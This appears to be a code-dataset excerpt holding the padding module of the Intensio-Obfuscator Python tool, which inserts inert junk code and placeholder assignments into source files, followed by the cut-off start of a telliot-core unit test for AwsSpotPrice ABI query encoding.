] | null | null | null | intensio/core/obfuscation/intensio_padding.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# https://github.com/Hnfull/Intensio-Obfuscator
#---------------------------------------------------------- [Lib] -----------------------------------------------------------#
import fileinput
import random
import textwrap
import re
import sys
from progress.bar import Bar
from core.obfuscation.intensio_mixer import Mixer
from core.utils.intensio_utils import Utils
from core.utils.intensio_error import EXIT_SUCCESS, EXIT_FAILURE
#------------------------------------------------- [Function(s)/Class(es)] --------------------------------------------------#
class Padding:
def __init__(self):
self.mixer = Mixer()
self.utils = Utils()
# -- Len of spaces -- #
self.space0 = ""
self.space4 = " "
self.space8 = " "
self.space12 = " "
self.space16 = " "
self.space20 = " "
self.space24 = " "
self.space28 = " "
self.space32 = " "
self.space36 = " "
self.space40 = " "
self.space44 = " "
self.space48 = " "
self.space52 = " "
self.space56 = " "
self.space60 = " "
self.space64 = " "
def ScriptsGenerator(self, mixerLengthArg, mixerLevelArg):
varRandom1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom3 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom4 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom5 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom6 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom7 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom8 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom9 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom10= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom11= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom12= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom13= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom14= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
# ---------- Python random scripts ---------- #
rand = random.randint(1, 7)
# -- script 1 -- #
if rand == 1:
scriptAssPadding1 = textwrap.dedent("""
{0} = '{5}'
{1} = '{6}'
{2} = '{7}'
{3} = '{8}'
{4} = '{9}'
if {0} in {1}:
{0} = {4}
if {1} in {2}:
{1} = {3}
elif {1} in {0}:
{2} = {1}
if {2} in {1}:
{1} = {4}
""").format(varRandom1, varRandom2, varRandom3, varRandom4, varRandom5, \
varRandom6, varRandom7, varRandom8, varRandom9, varRandom10)
return scriptAssPadding1
# -- script 2 -- #
elif rand == 2:
scriptAssPadding2 = textwrap.dedent("""
{0} = '{2}'
{1} = '{3}'
if {0} != {1}:
{0} = '{3}'
{1} = {0}
{0} = '{2}'
""").format(varRandom1, varRandom2, varRandom3, varRandom4)
return scriptAssPadding2
# -- script 3 -- #
elif rand == 3:
scriptAssPadding3 = textwrap.dedent("""
{0} = '{6}'
{1} = '{7}'
{2} = '{8}'
{3} = '{9}'
{4} = '{10}'
{5} = '{11}'
if {0} != {3}:
{1} = {2}
for {5} in {3}:
if {5} != {2}:
{1} = {1}
else:
{4} = {0}
else:
{2} = {0}
{0} = {4}
if {2} == {0}:
for {5} in {0}:
if {5} == {2}:
{2} = {0}
else:
{2} = {4}
""").format(varRandom1, varRandom2, varRandom3, varRandom4, varRandom5, \
varRandom6, varRandom7, varRandom8, varRandom9, varRandom10, \
varRandom11, varRandom12)
return scriptAssPadding3
# -- script 4 -- #
elif rand == 4:
scriptAssPadding4 = textwrap.dedent("""
{0} = '{3}'
{1} = '{4}'
{2} = '{5}'
if {0} == {1}:
{2} = '{5}'
{2} = {0}
else:
{2} = '{5}'
{2} = '{3}'
""").format(varRandom1, varRandom2, varRandom3, varRandom4, \
varRandom5, varRandom6,)
return scriptAssPadding4
# -- script 5 -- #
elif rand == 5:
scriptAssPadding5 = textwrap.dedent("""
{0} = '{6}'
{1} = '{7}'
{2} = '{8}'
{3} = '{9}'
{4} = '{10}'
{5} = '{11}'
if {2} == {3}:
for {5} in {4}:
if {5} == {3}:
{4} = {0}
else:
{3} = {1}
""").format(varRandom1, varRandom2, varRandom3, \
varRandom4, varRandom5, varRandom6, \
varRandom7, varRandom8, varRandom9, \
varRandom10, varRandom11, varRandom12)
return scriptAssPadding5
# -- script 6 -- #
elif rand == 6:
scriptAssPadding6 = textwrap.dedent("""
{0} = '{4}'
{1} = '{5}'
{2} = '{6}'
{3} = '{7}'
if {1} == {0}:
for {0} in {1}:
if {1} == {1}:
{2} = '{3}'
elif {2} == {3}:
{3} = {0}
else:
{0} = {1}
elif {2} == {2}:
for {2} in {1}:
if {3} == {1}:
{2} = '{3}'
elif {2} == {3}:
{3} = {0}
else:
{0} = {1}
for {2} in {1}:
if {3} == {1}:
{2} = '{3}'
elif {2} == {3}:
{3} = {0}
else:
{0} = {3}
else:
{0} = {1}
""").format(varRandom1, varRandom2, varRandom3, \
varRandom4, varRandom5, varRandom6, \
varRandom7, varRandom8)
return scriptAssPadding6
# -- script 7 -- #
elif rand == 7:
scriptAssPadding7 = textwrap.dedent("""
try:
{0} = '{7}'
{1} = '{8}'
{2} = '{9}'
{3} = '{10}'
{4} = '{11}'
{5} = '{12}'
{6} = [
'{7}',
'{9}',
'{11}',
'{13}'
]
for {0} in {5}:
for {1} in {2}:
if {3} == {4}:
{1} = {0}
elif {4} == {1}:
{1} = {5}
else:
{4} = {5}
for {1} in {6}:
{2} = {1}
except Exception:
pass
""").format(varRandom1, varRandom2, varRandom3, \
varRandom4, varRandom5, varRandom6, \
varRandom7, varRandom8, varRandom9, \
varRandom10, varRandom11, varRandom12, \
varRandom13, varRandom14)
return scriptAssPadding7
def AddRandomScripts(self, outputArg, mixerLengthArg, mixerLevelArg, verboseArg):
countScriptsAdded = 0
countLineAdded = 0
countLine = 0
checkLine = 0
checkQuotePassing = 0
checkCharPassing = 0
checkOtherCharPassing = 0
countRecursFiles = 0
addIndentScript = r".*\:{1}\s+$|.*\:{1}\s*$"
quotesIntoVariable = r".*={1}\s*[\"|\']{3}"
quotesEndMultipleLines = r"^\s*[\"|\']{3}\)?\.?"
quotesInRegex = r"={1}\s*r{1}[\"|\']{3}"
noAddScript = r"^\@|\s+\@|\s+return|\s*def\s+.+\s*\:{1}|^class\s+.+\s*\:{1}|.*[\{|\[|\(|\)|\]|\}|,|\\|^]\s*$|\s+yield.*|\s+raise.*"
quoteIntoVariable = r".*\={1}\s*\w*\.?\w*[\(|\.]{1}[\']{3}|.*\={1}\s*\w*\.?\w*[\(|\.]{1}[\"\"\"]{3}|.*\={1}\s*[\"]{3}|.*\={1}\s*[\']{3}"
recursFiles = self.utils.CheckFileDir(
output=outputArg,
detectFiles="py",
blockDir="__pycache__",
blockFile=False,
dirOnly=False
)
for number in recursFiles:
countRecursFiles += 1
print("\n[+] Running add of random scripts in {0} file(s)...\n".format(countRecursFiles))
# -- Count the number of lines that will be checked before filling -- #
with Bar("Setting up ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
with open(file , "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
if not eachLine:
continue
countLine += 1
bar.next(1)
bar.finish()
# -- Padding scripts added -- #
with Bar("Obfuscation ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
with fileinput.input(file, inplace=True) as inputFile:
for eachLine in inputFile:
sys.stdout.write(eachLine)
if eachLine == "\n":
continue
else:
spaces = len(eachLine) - len(eachLine.lstrip())
# -- Detect code into 3 quotes excepted comments -- #
if re.match(quotesIntoVariable, eachLine):
if re.match(quotesInRegex, eachLine):
pass
else:
checkQuotePassing += 1
continue
elif re.match(quotesEndMultipleLines, eachLine):
if re.match(quotesInRegex, eachLine):
pass
else:
checkQuotePassing += 1
if checkQuotePassing == 2:
checkQuotePassing = 0
continue
if checkQuotePassing == 1:
continue
elif checkQuotePassing == 2:
checkQuotePassing = 0
pass
else:
pass
# -- Check dict, list, tuple in multiple lines -- #
if checkCharPassing == 1:
if re.match(r".*[\"|\'|\)|\]|\}|\w]\s*$", eachLine):
checkCharPassing = 0
continue
else:
continue
elif checkOtherCharPassing >= 1:
if re.match(r".*[\"|\'|\)|\]|\}|\w]\s*$", eachLine):
checkOtherCharPassing -= 1
continue
else:
if re.match(r".*[\(|\{|\[]\s*$", eachLine):
checkOtherCharPassing += 1
continue
else:
pass
if re.match(noAddScript, eachLine):
if re.match(r".*[\\|,]\s*$", eachLine):
if checkCharPassing == 1:
continue
else:
checkCharPassing = 1
continue
elif re.match(r".*[\(|\{|\[]\s*$", eachLine):
checkOtherCharPassing += 1
continue
else:
continue
# -- Adding scripts -- #
elif re.match(addIndentScript, eachLine):
if spaces == 0:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space4)
)
countScriptsAdded += 1
elif spaces == 4:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space8)
)
countScriptsAdded += 1
elif spaces == 8:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space12)
)
countScriptsAdded += 1
elif spaces == 12:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space16)
)
countScriptsAdded += 1
elif spaces == 16:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space20)
)
countScriptsAdded += 1
elif spaces == 20:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space24)
)
countScriptsAdded += 1
elif spaces == 24:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space28)
)
countScriptsAdded += 1
elif spaces == 28:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space32)
)
countScriptsAdded += 1
elif spaces == 32:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space36)
)
countScriptsAdded += 1
elif spaces == 36:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space40)
)
countScriptsAdded += 1
elif spaces == 40:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space44)
)
countScriptsAdded += 1
elif spaces == 44:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space48)
)
countScriptsAdded += 1
elif spaces == 48:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space52)
)
countScriptsAdded += 1
elif spaces == 52:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space56)
)
countScriptsAdded += 1
elif spaces == 56:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space60)
)
countScriptsAdded += 1
elif spaces == 60:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space64)
)
countScriptsAdded += 1
else:
continue
else:
if spaces == 0:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space0)
)
countScriptsAdded += 1
elif spaces == 4:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space4)
)
countScriptsAdded += 1
elif spaces == 8:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space8)
)
countScriptsAdded += 1
elif spaces == 12:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space12)
)
countScriptsAdded += 1
elif spaces == 16:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space16)
)
countScriptsAdded += 1
elif spaces == 20:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space20)
)
countScriptsAdded += 1
elif spaces == 24:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space24)
)
countScriptsAdded += 1
elif spaces == 28:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space28)
)
countScriptsAdded += 1
elif spaces == 32:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space32)
)
countScriptsAdded += 1
elif spaces == 36:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space36)
)
countScriptsAdded += 1
elif spaces == 40:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space40)
)
countScriptsAdded += 1
elif spaces == 44:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space44)
)
countScriptsAdded += 1
elif spaces == 48:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space48)
)
countScriptsAdded += 1
elif spaces == 52:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space52)
)
countScriptsAdded += 1
elif spaces == 56:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space56)
)
countScriptsAdded += 1
elif spaces == 60:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space60)
)
countScriptsAdded += 1
else:
continue
bar.next(1)
bar.finish()
# -- Check if padding has added in output script -- #
with Bar("Check ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
with open(file , "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
if not eachLine:
continue
checkLine += 1
bar.next(1)
bar.finish()
countLineAdded = checkLine - countLine
if checkLine > countLine:
print("\n-> {0} scripts added in {1} file(s)\n".format(countScriptsAdded, countRecursFiles))
print("-> {0} lines added in {1} file(s)\n".format(countLineAdded, countRecursFiles))
return EXIT_SUCCESS
else:
return EXIT_FAILURE
def EmptyClasses(self, outputArg, mixerLengthArg, mixerLevelArg, verboseArg):
countRecursFiles = 0
counterToCheckIndent = 0
numberLine = 0
numberLineInFile = 0
emptyClassInfo = {}
emptyClassInfoCheck = {}
detectClass = r"^class\s+\w+|\s+class\s+\w+"
classDefined = r"class\s+(\w+)"
recursFiles = self.utils.CheckFileDir(
output=outputArg,
detectFiles="py",
blockDir="__pycache__",
blockFile=False,
dirOnly=False
)
for number in recursFiles:
countRecursFiles += 1
with Bar("Correction ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
# -- Count all line(s) in file -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLineInFile += 1
# -- Find and put empty class(es) in dict -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterClass = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterClass == spacesClass:
if search:
emptyClassInfo[search.group(1)] = file
numberLineInFile += 1 # Adding one line because padding will be added
numberLine += 1 # Adding one line because padding will be added
if re.match(detectClass, eachLine):
spacesClass = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(classDefined, eachLine)
if search:
emptyClassInfo[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(classDefined, eachLine)
# -- Add padding in empty class(es) -- #
numberLine = 0
with fileinput.input(file, inplace=True) as inputFile:
for eachLine in inputFile:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterClass = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterClass == spacesClass:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesClass == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesClass == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesClass == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
numberLine += 1
sys.stdout.write(eachLine)
if re.match(detectClass, eachLine):
spacesClass = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesClass == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesClass == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesClass == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
else:
counterToCheckIndent += 1
bar.next(1)
bar.finish()
# -- Check if class(es) is still empty -- #
if emptyClassInfo != {}:
with Bar("Check ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterClass = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterClass == spacesClass:
if search:
emptyClassInfo[search.group(1)] = file
numberLineInFile += 1
numberLine += 1
if re.match(detectClass, eachLine):
spacesClass = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(classDefined, eachLine)
if search:
emptyClassInfo[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(classDefined, eachLine)
bar.next(1)
bar.finish()
if emptyClassInfoCheck == {}:
for key, value in emptyClassInfo.items():
print("\n-> File : {0}".format(value))
print("-> Padding added in : {0} ( empty class )".format(key))
return EXIT_SUCCESS
else:
if verboseArg:
print("\n[!] No padding added to empty class(es)... :\n")
for key, value in emptyClassInfoCheck.items():
print("\n-> File : {0}".format(value))
print("-> Class : {0}".format(key))
return EXIT_FAILURE
else:
print("[!] No empty class found in {0}".format(outputArg))
return EXIT_SUCCESS
def EmptyFunctions(self, outputArg, mixerLengthArg, mixerLevelArg, verboseArg):
countRecursFiles = 0
counterToCheckIndent = 0
numberLine = 0
numberLineInFile = 0
emptyFuncInfo = {}
emptyFuncInfoCheck = {}
detectFunction = r"^def\s+\w+|\s+def\s\w+"
functionDefined = r"def\s+(\w+)"
recursFiles = self.utils.CheckFileDir(
output=outputArg,
detectFiles="py",
blockDir="__pycache__",
blockFile=False,
dirOnly=False
)
for number in recursFiles:
countRecursFiles += 1
with Bar("Correction ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
# -- Count all line(s) in file -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLineInFile += 1
# -- Find and put empty function(s) in dict -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterFunc = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterFunc == spacesFunc:
if search:
emptyFuncInfo[search.group(1)] = file
numberLineInFile += 1 # Adding one line because padding will be added
numberLine += 1 # Adding one line because padding will be added
if re.match(detectFunction, eachLine):
spacesFunc = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(functionDefined, eachLine)
if search:
emptyFuncInfo[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(functionDefined, eachLine)
# -- Add padding in empty function(s) -- #
numberLine = 0
with fileinput.input(file, inplace=True) as inputFile:
for eachLine in inputFile:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterFunc = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterFunc == spacesFunc:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesFunc == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesFunc == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesFunc == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
elif spacesFunc == 12:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space16))
elif spacesFunc == 16:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space20))
elif spacesFunc == 20:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space24))
numberLine += 1
sys.stdout.write(eachLine)
if re.match(detectFunction, eachLine):
spacesFunc = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesFunc == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesFunc == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesFunc == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
elif spacesFunc == 12:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space16))
elif spacesFunc == 16:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space20))
elif spacesFunc == 20:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space24))
else:
counterToCheckIndent += 1
bar.next(1)
bar.finish()
# -- Check if function(s) is still empty -- #
if emptyFuncInfo != {}:
with Bar("Check ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterFunc = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterFunc == spacesFunc:
if search:
emptyFuncInfoCheck[search.group(1)] = file
numberLineInFile += 1
numberLine += 1
if re.match(detectFunction, eachLine):
spacesFunc = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(functionDefined, eachLine)
if search:
emptyFuncInfoCheck[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(functionDefined, eachLine)
bar.next(1)
bar.finish()
if emptyFuncInfoCheck == {}:
for key, value in emptyFuncInfo.items():
print("\n-> File : {0}".format(value))
print("-> Padding added in : {0} ( empty function )".format(key))
return EXIT_SUCCESS
else:
if verboseArg:
print("\n[!] No padding added to empty function(s)... :\n")
for key, value in emptyFuncInfoCheck.items():
print("\n-> File : {0}".format(value))
print("-> Function : {0}".format(key))
return EXIT_FAILURE
else:
print("[!] No empty function found in {0}".format(outputArg))
return EXIT_SUCCESS | 64.195762 | 163 | 0.284558 | 2,835 | 63,618 | 6.375309 | 0.088183 | 0.026392 | 0.041053 | 0.060861 | 0.822176 | 0.808786 | 0.803751 | 0.720538 | 0.709472 | 0.700177 | 0 | 0.032742 | 0.651938 | 63,618 | 991 | 164 | 64.195762 | 0.783498 | 0.019884 | 0 | 0.717127 | 0 | 0.00221 | 0.154825 | 0.00443 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005525 | false | 0.026519 | 0.009945 | 0 | 0.033149 | 0.016575 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
29999814e9ee4b3dad7ff168842319add13021a2 | 1,997 | py | Python | tests/test_abi_query.py | t0mcr8se/telliot-core | 5512af5607aafa5c8c73104504ea51565b3c2d05 | [
"MIT"
] | null | null | null | tests/test_abi_query.py | t0mcr8se/telliot-core | 5512af5607aafa5c8c73104504ea51565b3c2d05 | [
"MIT"
] | null | null | null | tests/test_abi_query.py | t0mcr8se/telliot-core | 5512af5607aafa5c8c73104504ea51565b3c2d05 | [
"MIT"
] | null | null | null | from telliot_core.queries.abi_query import AbiQuery
from telliot_core.queries.price.aws_spot_price import AwsSpotPrice
def test_query_data():
q = AwsSpotPrice(zone="us-east-1f", instance="i3.16xlarge")
print(q.query_data.hex())
print(q.abi)
print(q.query_id.hex())
qr = AbiQuery.get_query_from_data(q.query_data)
assert isinstance(qr, AwsSpotPrice)
assert qr.zone == "us-east-1f"
assert qr.instance == "i3.16xlarge"
def test_get_query_from_data():
query_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cAwsSpotPrice\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nus-east-1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0